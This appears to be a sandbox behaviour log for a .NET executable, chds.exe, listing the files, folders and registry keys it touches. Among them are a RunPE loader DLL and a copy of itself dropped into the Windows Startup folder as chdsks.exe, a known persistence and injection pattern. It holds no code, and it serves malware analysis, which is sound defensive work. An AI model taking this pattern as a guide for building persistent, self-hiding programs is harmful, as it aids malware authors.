C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\chds.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\chds.INI C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol21.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Globalization\en-us.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources\chds.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources\chds.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\chds.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\chds.resources\chds.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\chds.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\chds.resources\chds.resources.exe C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe \Device\NamedPipe\ C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2100.1266359 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2100.1266359 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2100.1266406 C:\Windows\System32\Branding\Basebrd\Basebrd.dll C:\Windows\Branding\Basebrd\basebrd.dll C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe" C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe.config C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe.Local\ C:\Users\Seven01\AppData\Roaming C:\Users\Seven01\AppData\Roaming\Microsoft\Windows C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs C:\Users\Seven01\AppData\Roaming\Microsoft C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.INI C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources\chds.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources\chds.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources\chds.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources\chds.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2312.1271562 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2312.1271562 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2312.1271562 C:\Users\Seven01\AppData\Local\Temp\reg.* C:\Users\Seven01\AppData\Local\Temp\reg C:\ProgramData\Oracle\Java\javapath\reg.* C:\ProgramData\Oracle\Java\javapath\reg C:\Windows\System32\reg.* C:\Windows\System32\reg.COM C:\Windows\System32\reg.exe C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\SysWOW64\ntdll.dll
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\chds.exe.config C:\Users\Seven01\AppData\Local\Temp\chds.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\System32\l_intl.nls \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol21.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll \Device\NamedPipe\ C:\Windows\Branding\Basebrd\basebrd.dll C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe.config C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\SysWOW64\ntdll.dll
Write Files
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2100.1266359 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2100.1266359 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2100.1266406 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2312.1271562 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2312.1271562 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2312.1271562
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chds.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\31bd1f54\5a317755 HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status 